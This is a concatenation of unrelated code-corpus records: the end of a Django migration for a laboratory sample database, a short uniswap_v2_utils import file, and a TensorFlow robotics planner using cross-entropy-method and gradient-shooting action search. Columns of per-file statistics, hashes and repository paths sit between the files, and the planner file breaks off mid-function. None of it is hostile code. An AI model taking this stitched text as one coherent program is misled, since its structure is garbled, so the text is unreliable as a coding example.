                ('column', models.IntegerField(blank=True, null=True, verbose_name='Column')),
                ('img_col', models.IntegerField(blank=True, null=True, verbose_name='Image Column')),
                ('file_ch1', models.CharField(blank=True, max_length=50, null=True, verbose_name='File_Ch1')),
                ('file_ch2', models.CharField(blank=True, max_length=50, null=True, verbose_name='File_Ch2')),
                ('fld_section', models.CharField(blank=True, max_length=50, null=True, verbose_name='Fld_Section')),
                ('fld_index', models.CharField(blank=True, max_length=50, null=True, verbose_name='Fld_Index')),
                ('num_live', models.IntegerField(blank=True, null=True, verbose_name='Num_Live')),
                ('num_dead', models.IntegerField(blank=True, null=True, verbose_name='Num_Dead')),
                ('num_other', models.IntegerField(blank=True, null=True, verbose_name='Num_Other')),
                ('rev_live', models.IntegerField(blank=True, null=True, verbose_name='Rev_Live')),
                ('rev_dead', models.IntegerField(blank=True, null=True, verbose_name='Rev_Dead')),
                ('rev_other', models.IntegerField(blank=True, null=True, verbose_name='Rev_Other')),
                ('condition', models.CharField(blank=True, max_length=50, null=True, verbose_name='experimental_condition')),
                ('index_i7', models.CharField(blank=True, max_length=50, null=True, verbose_name='Index_I7')),
                ('primer_i7', models.CharField(blank=True, max_length=50, null=True, verbose_name='Primer_I7')),
                ('index_i5', models.CharField(blank=True, max_length=50, null=True, verbose_name='Index_I5')),
                ('primer_i5', models.CharField(blank=True, max_length=50, null=True, verbose_name='Primer_I5')),
                ('pick_met', models.CharField(blank=True, max_length=50, null=True, verbose_name='cell_call')),
                ('spot_well', models.CharField(blank=True, max_length=50, null=True, verbose_name='Spot_Well')),
                ('num_drops', models.IntegerField(blank=True, null=True, verbose_name='Num_Drops')),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
            ],
            options={
                'verbose_name': 'historical sublibrary information',
                'db_table': 'sub_library_information_history',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
        # JIRA account linked to DLP/10x workflows.
        migrations.CreateModel(
            name='JiraUser',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('username', models.CharField(max_length=150)),
                ('name', models.CharField(max_length=150)),
                ('associated_with_dlp', models.BooleanField(default=True)),
                ('associated_with_tenx', models.BooleanField(default=True)),
            ],
        ),
        # Metadata key definitions (values live in ChipRegionMetadata).
        migrations.CreateModel(
            name='MetadataField',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('field', models.CharField(max_length=50, verbose_name='Metadata key')),
            ],
        ),
        migrations.CreateModel(
            name='Project',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('description', models.TextField(blank=True, null=True)),
            ],
            options={
                'ordering': ['name'],
            },
            bases=(models.Model, core.helpers.FieldValue),
        ),
        migrations.CreateModel(
            name='Sample',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sample_id', models.CharField(max_length=50, null=True, verbose_name='Sample ID')),
                ('taxonomy_id', models.CharField(blank=True, default='9606', max_length=50, null=True, verbose_name='Taxonomy ID')),
                ('sample_type', models.CharField(blank=True, choices=[('P', 'Patient'), ('C', 'Cell Line'), ('X', 'Xenograft'), ('Or', 'Organoid'), ('O', 'Other')], max_length=50, null=True, verbose_name='Sample type')),
                ('anonymous_patient_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Anonymous patient ID')),
                ('cell_line_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cell line ID')),
                ('xenograft_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Xenograft ID')),
                ('xenograft_recipient_taxonomy_id', models.CharField(blank=True, default='10090', max_length=50, null=True, verbose_name='Xenograft recipient taxonomy ID')),
                ('xenograft_treatment_status', models.CharField(blank=True, default='', max_length=50, verbose_name='Xenograft treatment status')),
                ('strain', models.CharField(blank=True, max_length=50, null=True, verbose_name='Strain')),
                ('xenograft_biopsy_date', models.DateField(blank=True, null=True, verbose_name='Xenograft biopsy date')),
                ('notes', models.TextField(blank=True, max_length=5000, null=True, verbose_name='Notes')),
            ],
            options={
                'ordering': ['sample_id'],
            },
            bases=(models.Model, core.helpers.FieldValue),
        ),
        # One row per sublibrary (cell spot) on a chip region.
        migrations.CreateModel(
            name='SublibraryInformation',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sample', models.CharField(blank=True, max_length=50, null=True, verbose_name='Sample')),
                ('row', models.IntegerField(blank=True, null=True, verbose_name='Row')),
                ('column', models.IntegerField(blank=True, null=True, verbose_name='Column')),
                ('img_col', models.IntegerField(blank=True, null=True, verbose_name='Image Column')),
                ('file_ch1', models.CharField(blank=True, max_length=50, null=True, verbose_name='File_Ch1')),
                ('file_ch2', models.CharField(blank=True, max_length=50, null=True, verbose_name='File_Ch2')),
                ('fld_section', models.CharField(blank=True, max_length=50, null=True, verbose_name='Fld_Section')),
                ('fld_index', models.CharField(blank=True, max_length=50, null=True, verbose_name='Fld_Index')),
                ('num_live', models.IntegerField(blank=True, null=True, verbose_name='Num_Live')),
                ('num_dead', models.IntegerField(blank=True, null=True, verbose_name='Num_Dead')),
                ('num_other', models.IntegerField(blank=True, null=True, verbose_name='Num_Other')),
                ('rev_live', models.IntegerField(blank=True, null=True, verbose_name='Rev_Live')),
                ('rev_dead', models.IntegerField(blank=True, null=True, verbose_name='Rev_Dead')),
                ('rev_other', models.IntegerField(blank=True, null=True, verbose_name='Rev_Other')),
                ('condition', models.CharField(blank=True, max_length=50, null=True, verbose_name='experimental_condition')),
                ('index_i7', models.CharField(blank=True, max_length=50, null=True, verbose_name='Index_I7')),
                ('primer_i7', models.CharField(blank=True, max_length=50, null=True, verbose_name='Primer_I7')),
                ('index_i5', models.CharField(blank=True, max_length=50, null=True, verbose_name='Index_I5')),
                ('primer_i5', models.CharField(blank=True, max_length=50, null=True, verbose_name='Primer_I5')),
                ('pick_met', models.CharField(blank=True, max_length=50, null=True, verbose_name='cell_call')),
                ('spot_well', models.CharField(blank=True, max_length=50, null=True, verbose_name='Spot_Well')),
                ('num_drops', models.IntegerField(blank=True, null=True, verbose_name='Num_Drops')),
                ('chip_region', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='core.ChipRegion', verbose_name='Chip_Region')),
            ],
            bases=(models.Model, core.helpers.FieldValue),
        ),
    ]
| 76.571875
| 317
| 0.611762
| 2,651
| 24,503
| 5.449264
| 0.087891
| 0.101274
| 0.117334
| 0.139416
| 0.930984
| 0.928838
| 0.926277
| 0.926277
| 0.926277
| 0.904818
| 0
| 0.014669
| 0.223769
| 24,503
| 319
| 318
| 76.811912
| 0.744848
| 0.002816
| 0
| 0.826367
| 1
| 0
| 0.224551
| 0.031354
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016077
| 0
| 0.028939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e2fd9b72303648dae3dfdfa2c4d0a2b7b6a25ffe
| 164
|
py
|
Python
|
src/ctc/protocols/uniswap_v2_utils/__init__.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 94
|
2022-02-15T19:34:49.000Z
|
2022-03-26T19:26:22.000Z
|
src/ctc/protocols/uniswap_v2_utils/__init__.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 7
|
2022-03-03T02:58:47.000Z
|
2022-03-11T18:41:05.000Z
|
src/ctc/protocols/uniswap_v2_utils/__init__.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 7
|
2022-02-15T17:53:07.000Z
|
2022-03-17T19:14:17.000Z
|
from .uniswap_v2_deltas import *
from .uniswap_v2_events import *
from .uniswap_v2_metadata import *
from .uniswap_v2_spec import *
from .uniswap_v2_state import *
| 27.333333
| 34
| 0.817073
| 25
| 164
| 4.96
| 0.36
| 0.443548
| 0.524194
| 0.612903
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034722
| 0.121951
| 164
| 5
| 35
| 32.8
| 0.826389
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
3909f9fc72229c5e4f7632df5919c798d9731eae
| 36,253
|
py
|
Python
|
railrl/planner/forward_planner/planner.py
|
fredshentu/public_model_based_controller
|
9301699bc56aa49ba5c699f7d5be299046a8aa0c
|
[
"MIT"
] | null | null | null |
railrl/planner/forward_planner/planner.py
|
fredshentu/public_model_based_controller
|
9301699bc56aa49ba5c699f7d5be299046a8aa0c
|
[
"MIT"
] | null | null | null |
railrl/planner/forward_planner/planner.py
|
fredshentu/public_model_based_controller
|
9301699bc56aa49ba5c699f7d5be299046a8aa0c
|
[
"MIT"
] | null | null | null |
from railrl.data_management.simple_replay_pool import SimpleReplayPool
from railrl.predictors.dynamics_model import FullyConnectedEncoder, InverseModel, ForwardModel
import tensorflow as tf
import time
import numpy as np
from sandbox.rocky.tf.optimizers.penalty_lbfgs_optimizer import PenaltyLbfgsOptimizer
from railrl.misc.pyhelper_fns.vis_utils import MyAnimationMulti
def planner_info(arm_loss, box_loss, forward_models_outputs):
    """Bundle planner diagnostics into a single result dictionary."""
    return {
        'arm_loss': arm_loss,
        'box_loss': box_loss,
        'forward_models_outputs': forward_models_outputs,
    }
def gather_cols(params, indices, name=None):
    """Gather columns of a 2D tensor.

    Args:
        params: A 2D tensor.
        indices: A 1D tensor. Must be one of the following types: ``int32``, ``int64``.
        name: A name for the operation (optional).

    Returns:
        A 2D Tensor. Has the same type as ``params``.

    Raises:
        ValueError: if ``params`` is not 2D or ``indices`` is not 1D.
    """
    # NOTE(review): tf.op_scope is the TF 0.x/1.x-era API; this file appears
    # to target that TensorFlow generation, so it is kept as-is.
    with tf.op_scope([params, indices], name, "gather_cols") as scope:
        # Validate ranks before building the gather graph.
        params = tf.convert_to_tensor(params, name="params")
        indices = tf.convert_to_tensor(indices, name="indices")
        try:
            params.get_shape().assert_has_rank(2)
        except ValueError:
            raise ValueError('\'params\' must be 2D.')
        try:
            indices.get_shape().assert_has_rank(1)
        except ValueError:
            # Bug fix: this error previously blamed 'params', but the failing
            # rank check is on 'indices'.
            raise ValueError('\'indices\' must be 1D.')

        # Flatten params and compute, for every row, the flat index of each
        # requested column: row * n_cols + column_index.
        p_shape = tf.shape(params)
        p_flat = tf.reshape(params, [-1])
        i_flat = tf.reshape(
            tf.reshape(tf.range(0, p_shape[0]) * p_shape[1], [-1, 1]) + indices,
            [-1])
        return tf.reshape(tf.gather(p_flat, i_flat),
                          [p_shape[0], -1])
"""
Planner takes two states (S_init and S_goal) and outputs an action.
Fine Tune is out of the scope of Planner
"""
class Planner(object):
    """Base planner: maps a pair of states (S_init, S_goal) to an action.

    Fine-tuning is out of the scope of Planner; subclasses are expected to
    override ``get_action``.
    """

    def __init__(self, dynamic_model, encoder, sess):
        self.encoder = encoder
        self.dynamic_model = dynamic_model
        self.sess = sess
        ## initialize the model.....

    def get_action(self, S_init, S_goal):
        # Bug fix: 'self' was missing from the signature, so any instance call
        # bound S_init to self and raised TypeError on the second argument.
        return None
"""
Inverse-model planner should be easy: just return the predicted action.
"""
class InverseModelPlanner(object):
    """Planner backed by an inverse dynamics model.

    The inverse model directly predicts the action that takes the system from
    S_init to S_goal, so planning is a single session run.
    """

    def __init__(self, dynamic_model, env, encoder, sess=None):
        """Rebuild the inverse-model graph with weight-tied copies.

        :param dynamic_model: inverse model supporting get_weight_tied_copy
        :param env: environment providing observation_space.shape
        :param encoder: state encoder supporting get_weight_tied_copy
        :param sess: TF session; defaults to the current default session
        """
        # Idiom fix: compare against the None singleton with 'is', not '=='.
        if sess is None:
            sess = tf.get_default_session()
        self.sess = sess
        # Re-construct the dynamic model on fresh placeholders.
        self.S_init_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
        self.S_goal_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
        encoder1 = encoder.get_weight_tied_copy(observation_input=self.S_init_ph)
        encoder2 = encoder.get_weight_tied_copy(observation_input=self.S_goal_ph)
        self.inverse_model = dynamic_model.get_weight_tied_copy(
            feature_input1=encoder1.output,
            feature_input2=encoder2.output)

    def get_action(self, S_init, S_goal):
        """Predict the action that moves the system from S_init to S_goal."""
        action = self.sess.run(
            self.inverse_model.output,
            feed_dict={self.S_init_ph: S_init, self.S_goal_ph: S_goal})
        return action
"""
ForwardModel planner: optimizes the action according to this objective:
min_{a} (S_next - S_goal)^2
"""
class CEMPlanner_arm_coord():
def __init__(
        self,
        dynamic_model,
        encoder,
        env,
        sess = None,
        max_length = 15,
        sample_batch_size = 2000,
        top_k = 200,
        action_penalty=False,
        accumulated_loss = False):
    """Build the CEM planning graph over an unrolled forward model.

    Unrolls ``dynamic_model`` for ``max_length`` steps so a cross-entropy
    -method search over action sequences can be scored in one session run.

    :param dynamic_model: forward model supporting get_weight_tied_copy
        (project type — exact contract assumed from usage).
    :param encoder: state encoder supporting get_weight_tied_copy.
    :param env: environment handle (stored; not used in graph building).
    :param sess: TF session; defaults to the current default session.
    :param max_length: number of unrolled forward-model steps.
    :param sample_batch_size: CEM samples drawn per iteration.
    :param top_k: elite sample count kept per CEM iteration.
    :param action_penalty: if True, add an L2 penalty on actions to every
        step's objective.
    :param accumulated_loss: if True, the objective at step t sums the
        box-position error over steps 1..t instead of using only step t.
    """
    self.sample_batch_size = sample_batch_size
    self.top_k = top_k
    self.env = env
    if sess == None:
        sess =tf.get_default_session()
    self.sess = sess
    self.max_length = max_length
    # One action per unrolled step: [step, batch, 4] (4-dim action assumed).
    self.action_ph = tf.placeholder(tf.float32, [max_length, None, 4])
    self.forward_model_list = []
    # build the recurrent model w.t. the max length
    # NOTE(review): observations appear to be 24-dimensional — confirm.
    self.S_init_ph = tf.placeholder(tf.float32, [None, 24])
    self.S_goal_ph = tf.placeholder(tf.float32, [None, 24])
    # only two feature encoders
    self.encoder1 = encoder.get_weight_tied_copy(observation_input=self.S_init_ph)
    self.encoder2 = encoder.get_weight_tied_copy(observation_input=self.S_goal_ph)
    # Step 1 consumes the encoded initial state; later steps feed each
    # model's output back in as the next feature input.
    forward_model = dynamic_model.get_weight_tied_copy(feature_input=self.encoder1.output,
                                                       action_input=self.action_ph[0])
    self.forward_model_list.append(forward_model)
    self.forward_model_output_list = [forward_model.output] #for debug purpose only
    for i in range(1,max_length):
        forward_model = dynamic_model.get_weight_tied_copy(feature_input = forward_model.output,\
                                                           action_input = self.action_ph[i])
        self.forward_model_list.append(forward_model)
        self.forward_model_output_list.append(forward_model.output)

    ## objective
    def transfer_box_global_tf(obs):
        # Box position in global coordinates: arm position (cols 21-22)
        # plus the scaled arm-to-box offset (cols 4-5).
        arm2box = gather_cols(obs, [4,5])/10.0
        return gather_cols(obs, [21,22]) + arm2box

    self.objective_list = []
    self.arm_loss_list = []
    self.box_loss_list = []
    self.objective_topk_index_list = []
    current_objective = 0
    # objective: squared distance between predicted and goal box positions,
    # per CEM sample (one scalar per batch element).
    for forward_model in self.forward_model_list:
        if accumulated_loss:
            current_objective += tf.reduce_sum(tf.square(transfer_box_global_tf(forward_model.output)-\
                                               transfer_box_global_tf(self.encoder2.output)), axis = 1)
        else:
            current_objective = tf.reduce_sum(tf.square(transfer_box_global_tf(forward_model.output)-\
                                              transfer_box_global_tf(self.encoder2.output)), axis = 1)
        self.objective_list.append(current_objective)
        # Diagnostics on the first batch element only (index [0]).
        self.arm_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][:4] - self.encoder2.output[0][:4])))
        self.box_loss_list.append(tf.reduce_sum(tf.square(transfer_box_global_tf(forward_model.output)-\
                                                transfer_box_global_tf(self.encoder2.output)))*100)
    if action_penalty:
        # L2 penalty summed over steps and action dims, weighted 0.5.
        for i in range(len(self.objective_list)):
            self.objective_list[i] += tf.reduce_sum(tf.square(self.action_ph),axis = [0,2])*0.5
def get_action(self, S_init, S_goal, steps = 1, plot_loss = False, debug = False, stop_variance = 0.2, stop_itr = 3, init_batch_size = 50000):
assert(steps <= self.max_length)
#fit a multivariable Gaussian
mean_list = None
cov_matrix = None
batch_S_init = np.dot(np.ones([init_batch_size, 1]), S_init.reshape(1,-1))
batch_S_goal = np.dot(np.ones([init_batch_size, 1]), S_goal.reshape(1,-1))
#CEM
actions = np.random.rand(self.max_length, init_batch_size, 4)*2 - 1
objective_list = self.sess.run(self.objective_list[steps-1], feed_dict = {self.action_ph:actions, \
self.S_init_ph:batch_S_init, self.S_goal_ph:batch_S_goal})
sorted_index = np.argsort(objective_list)[:self.top_k]
# debug
# action_pen, objective_debug = self.sess.run([tf.reduce_sum(tf.square(self.action_ph),axis = [0,2])*0.3, self.objective_list[14]], feed_dict = {self.action_ph:actions, \
# self.S_init_ph:batch_S_init, self.S_goal_ph:batch_S_goal})
# import pdb; pdb.set_trace()
best_actions = actions[:,sorted_index, :]
trans_best_actions = np.moveaxis(best_actions, 0, 1).reshape(self.top_k, -1)
cov_matrix = np.cov(trans_best_actions.T)
mean_list = np.mean(trans_best_actions.T, axis = 1)
batch_S_init = np.dot(np.ones([self.sample_batch_size, 1]), S_init.reshape(1,-1))
batch_S_goal = np.dot(np.ones([self.sample_batch_size, 1]), S_goal.reshape(1,-1))
for i in range(stop_itr-1):
actions = np.random.multivariate_normal(mean_list, cov_matrix, self.sample_batch_size).reshape(self.sample_batch_size, self.max_length, 4)
actions = np.moveaxis(actions, 0,1)
objective_list = self.sess.run(self.objective_list[steps-1], feed_dict = {self.action_ph:actions, \
self.S_init_ph:batch_S_init, self.S_goal_ph:batch_S_goal})
sorted_index = np.argsort(objective_list)[:self.top_k]
best_actions = actions[:,sorted_index, :]
trans_best_actions = np.moveaxis(best_actions, 0, 1).reshape(self.top_k, -1)
cov_matrix = np.cov(trans_best_actions.T)
mean_list = np.mean(trans_best_actions.T, axis = 1)
# import pdb; pdb.set_trace()
#if debug, visualize all forward model's output
best_action = best_actions[:,0,:]
arm_loss, box_loss,forward_models_outputs, final_objective = self.sess.run([self.arm_loss_list[0], self.box_loss_list[0], \
self.forward_model_output_list, self.objective_list[steps-1]], \
{self.action_ph: best_action.reshape(15,1,4), \
self.S_init_ph:[S_init], self.S_goal_ph:[S_goal]})
print("final objective")
print(final_objective)
# import pdb; pdb.set_trace()
return best_actions[0,0], {'arm_loss':arm_loss, 'box_loss':box_loss, 'forward_models_outputs':forward_models_outputs[:steps]}
class CEMPlanner():
    """Cross-entropy-method (CEM) planner over raw environment observations.

    Unrolls ``max_length`` weight-tied copies of the forward model and searches
    for an action sequence minimizing the squared distance between the
    predicted state and the goal state (optionally positions only).
    """

    def __init__(
            self,
            dynamic_model,
            encoder,
            env,
            sess=None,
            pos_only=True,
            max_length=15,
            sample_batch_size=2000,
            top_k=200,
            action_penalty=False,
            accumulated_loss=False):
        """Build the unrolled planning graph.

        Args:
            dynamic_model: forward model exposing ``get_weight_tied_copy``.
            encoder: state encoder exposing ``get_weight_tied_copy``.
            env: environment providing ``observation_space.shape``.
            sess: TF session; defaults to the current default session.
            pos_only: if True, the objective uses only state dims 4:7
                (box position — TODO confirm); otherwise the full state.
            max_length: planning horizon (number of unrolled forward models).
            sample_batch_size: CEM samples per refinement iteration.
            top_k: number of elite samples used to refit the Gaussian.
            action_penalty: if True, add 0.5 * sum(a^2) to every objective.
            accumulated_loss: if True, sum the loss over all intermediate
                steps instead of using only the final step's loss.
        """
        self.sample_batch_size = sample_batch_size
        self.top_k = top_k
        self.env = env
        if sess == None:
            sess = tf.get_default_session()
        self.sess = sess
        self.max_length = max_length
        # Action sequence placeholder: [horizon, batch, action_dim=4].
        self.action_ph = tf.placeholder(tf.float32, [max_length, None, 4])
        self.forward_model_list = []
        # Build the recurrent model w.r.t. the max length.
        self.S_init_ph = tf.placeholder(tf.float32, [None] + list(env.observation_space.shape))
        self.S_goal_ph = tf.placeholder(tf.float32, [None] + list(env.observation_space.shape))
        # Only two feature encoders (init and goal states).
        self.encoder1 = encoder.get_weight_tied_copy(observation_input=self.S_init_ph)
        self.encoder2 = encoder.get_weight_tied_copy(observation_input=self.S_goal_ph)
        forward_model = dynamic_model.get_weight_tied_copy(feature_input=self.encoder1.output,
                                                           action_input=self.action_ph[0])
        self.forward_model_list.append(forward_model)
        self.forward_model_output_list = [forward_model.output]  # for debug purpose only
        # Chain the remaining steps: each model consumes the previous prediction.
        for i in range(1, max_length):
            forward_model = dynamic_model.get_weight_tied_copy(feature_input=forward_model.output,
                                                               action_input=self.action_ph[i])
            self.forward_model_list.append(forward_model)
            self.forward_model_output_list.append(forward_model.output)
        ## objective: one per horizon length so get_action can plan for any `steps`
        self.objective_list = []
        self.arm_loss_list = []
        self.box_loss_list = []
        self.objective_topk_index_list = []
        current_objective = 0
        if pos_only:
            for forward_model in self.forward_model_list:
                if accumulated_loss:
                    current_objective += tf.reduce_sum(tf.square(gather_cols(forward_model.output, [4, 5, 6])
                                                                 - gather_cols(self.encoder2.output, [4, 5, 6])), axis=1)
                else:
                    current_objective = tf.reduce_sum(tf.square(gather_cols(forward_model.output, [4, 5, 6])
                                                                - gather_cols(self.encoder2.output, [4, 5, 6])), axis=1)
                self.objective_list.append(current_objective)
                # Diagnostic losses on the first batch element.
                self.arm_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][:4] - self.encoder2.output[0][:4])))
                self.box_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][4:6] - self.encoder2.output[0][4:6])))
        else:
            for forward_model in self.forward_model_list:
                self.objective_list.append(tf.reduce_sum(tf.square(forward_model.output[0] - self.encoder2.output[0])))
                self.arm_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][:4] - self.encoder2.output[0][:4])))
                self.box_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][4:6] - self.encoder2.output[0][4:6])))
        if action_penalty:
            for i in range(len(self.objective_list)):
                self.objective_list[i] += tf.reduce_sum(tf.square(self.action_ph), axis=[0, 2]) * 0.5

    def get_action(self, S_init, S_goal, steps=1, plot_loss=False, debug=False, stop_variance=0.2, stop_itr=3, init_batch_size=50000):
        """Run CEM and return the first action of the best sequence found.

        Returns:
            (action, info) where action is the first step of the elite sequence
            and info holds diagnostic losses and predicted rollout states.
        """
        assert (steps <= self.max_length)
        # Fit a multivariate Gaussian over flattened action sequences.
        mean_list = None
        cov_matrix = None
        batch_S_init = np.dot(np.ones([init_batch_size, 1]), S_init.reshape(1, -1))
        batch_S_goal = np.dot(np.ones([init_batch_size, 1]), S_goal.reshape(1, -1))
        # CEM seed: uniform actions in [-1, 1].
        actions = np.random.rand(self.max_length, init_batch_size, 4) * 2 - 1
        objective_list = self.sess.run(self.objective_list[steps - 1],
                                       feed_dict={self.action_ph: actions,
                                                  self.S_init_ph: batch_S_init,
                                                  self.S_goal_ph: batch_S_goal})
        sorted_index = np.argsort(objective_list)[:self.top_k]
        best_actions = actions[:, sorted_index, :]
        trans_best_actions = np.moveaxis(best_actions, 0, 1).reshape(self.top_k, -1)
        cov_matrix = np.cov(trans_best_actions.T)
        mean_list = np.mean(trans_best_actions.T, axis=1)
        batch_S_init = np.dot(np.ones([self.sample_batch_size, 1]), S_init.reshape(1, -1))
        batch_S_goal = np.dot(np.ones([self.sample_batch_size, 1]), S_goal.reshape(1, -1))
        # Refinement iterations: sample from the elite Gaussian, refit on elites.
        for i in range(stop_itr - 1):
            actions = np.random.multivariate_normal(mean_list, cov_matrix, self.sample_batch_size).reshape(self.sample_batch_size, self.max_length, 4)
            actions = np.moveaxis(actions, 0, 1)
            objective_list = self.sess.run(self.objective_list[steps - 1],
                                           feed_dict={self.action_ph: actions,
                                                      self.S_init_ph: batch_S_init,
                                                      self.S_goal_ph: batch_S_goal})
            sorted_index = np.argsort(objective_list)[:self.top_k]
            best_actions = actions[:, sorted_index, :]
            trans_best_actions = np.moveaxis(best_actions, 0, 1).reshape(self.top_k, -1)
            cov_matrix = np.cov(trans_best_actions.T)
            mean_list = np.mean(trans_best_actions.T, axis=1)
        best_action = best_actions[:, 0, :]
        # BUGFIX: reshape with self.max_length instead of a hard-coded 15, so
        # planners built with a different horizon do not crash here.
        arm_loss, box_loss, forward_models_outputs, final_objective = self.sess.run(
            [self.arm_loss_list[0], self.box_loss_list[0],
             self.forward_model_output_list, self.objective_list[steps - 1]],
            {self.action_ph: best_action.reshape(self.max_length, 1, 4),
             self.S_init_ph: [S_init], self.S_goal_ph: [S_goal]})
        print("final objective")
        print(final_objective)
        arm_obj = np.sum(np.square(forward_models_outputs[steps - 1][0][:4] - S_goal[:4]))
        box_obj = np.sum(np.square(forward_models_outputs[steps - 1][0][4:7] - S_goal[4:7]))
        print('arm objective is {}, box objective is {}'.format(arm_obj, box_obj))
        return best_actions[0, 0], {'arm_loss': arm_loss, 'box_loss': box_loss,
                                    'forward_models_outputs': forward_models_outputs[:steps]}
class FastClippedSgdShootingForwardModelPlanner_cumulated_obj(object):
    """Shooting planner optimizing an action sequence by clipped gradient descent.

    Unrolls ``max_length`` weight-tied forward models; the objective for step t
    accumulates the losses of all steps up to t (hence "_cumulated_obj"), so
    intermediate predicted states are also pulled toward the goal.
    """
    def __init__(
            self,
            dynamic_model,
            encoder,
            env,
            init_lr = 0.5,
            sess = None,
            pos_only = False,
            max_length = 15,
            ):
        """Build the unrolled graph and per-horizon objectives/gradients.

        Args:
            dynamic_model: forward model exposing ``get_weight_tied_copy``.
            encoder: state encoder exposing ``get_weight_tied_copy``.
            env: environment providing ``observation_space.shape``.
            init_lr: base step size used by get_action's updates.
            sess: TF session; defaults to the current default session.
            pos_only: if True, penalize only the first 6 state dims
                (arm + box position — TODO confirm) with geometric weighting.
            max_length: maximum planning horizon.
        """
        if sess == None:
            sess = tf.get_default_session()
        self.sess = sess
        self.init_lr = init_lr
        self.max_length = max_length
        # Action sequence placeholder: [horizon, batch=1, action_dim=4].
        self.action_ph = tf.placeholder(tf.float32, [max_length, 1, 4])
        self.forward_model_list = []
        # Build the recurrent model w.r.t. the max length.
        self.S_init_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
        self.S_goal_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
        # Only two feature encoders (init and goal states).
        self.encoder1 = encoder.get_weight_tied_copy(observation_input=[self.S_init_ph])
        self.encoder2 = encoder.get_weight_tied_copy(observation_input=[self.S_goal_ph])
        forward_model = dynamic_model.get_weight_tied_copy(feature_input=self.encoder1.output,
                                                           action_input=self.action_ph[0])
        self.forward_model_list.append(forward_model)
        # Chain the remaining steps: each model consumes the previous prediction.
        for i in range(1, max_length):
            forward_model = dynamic_model.get_weight_tied_copy(feature_input = forward_model.output,
                                                               action_input = self.action_ph[i])
            self.forward_model_list.append(forward_model)
        ## objective: objective_list[t] = cumulative loss over steps 0..t
        self.objective_list = []
        self.forward_model_loss_list = []
        self.arm_loss_list = []
        self.box_loss_list = []
        objective = 0
        factor = 1
        if pos_only:
            for forward_model in self.forward_model_list:
                # Geometric discount: each later step's loss is weighted by 0.4^t.
                factor = factor * 0.4
                self.forward_model_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][:6] - self.encoder2.output[0][:6])))
                objective += factor * tf.reduce_sum(tf.square(forward_model.output[0][:6] - self.encoder2.output[0][:6]))
                self.objective_list.append(objective)
                # Diagnostic losses (dims 0:4 = arm, 4:6 = box — TODO confirm).
                self.arm_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][:4] - self.encoder2.output[0][:4])))
                self.box_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][4:6] - self.encoder2.output[0][4:6])))
        else:
            # NOTE(review): arm_loss_list/box_loss_list stay empty on this branch,
            # so the final fetch in get_action raises IndexError when
            # pos_only=False — confirm intended usage is pos_only=True.
            for forward_model in self.forward_model_list:
                objective += tf.reduce_sum(tf.square(forward_model.output[0] - self.encoder2.output[0]))
                self.objective_list.append(objective)
        self.action_grad_list = []
        for obj in self.objective_list:
            # Those tail terms in action_ph will receive 0 gradient.
            self.action_grad_list.append(tf.gradients(obj, self.action_ph))
        # Live plotting helper: first axis is the 1-step loss, second the cumulated loss.
        self.vis_tool = MyAnimationMulti(None, numPlots=2, isIm=[0, 0], axTitles=['(S1-S_goal)^2', 'sum(S_i-S_goal)^2'])

    def get_action(self, S_init, S_goal, steps = None, plot_loss = False):
        """Optimize the action sequence with 101 clipped gradient steps.

        Returns:
            (first_action, [arm_loss, box_loss, first predicted state]).
        """
        if steps == None:
            steps = 1  # greedy planner
        else:
            assert(steps <= self.max_length)
        action = np.zeros([self.max_length, 1, 4])
        action_grad = self.action_grad_list[steps - 1]
        # TODO: Find a good stop criteria
        now = time.time()
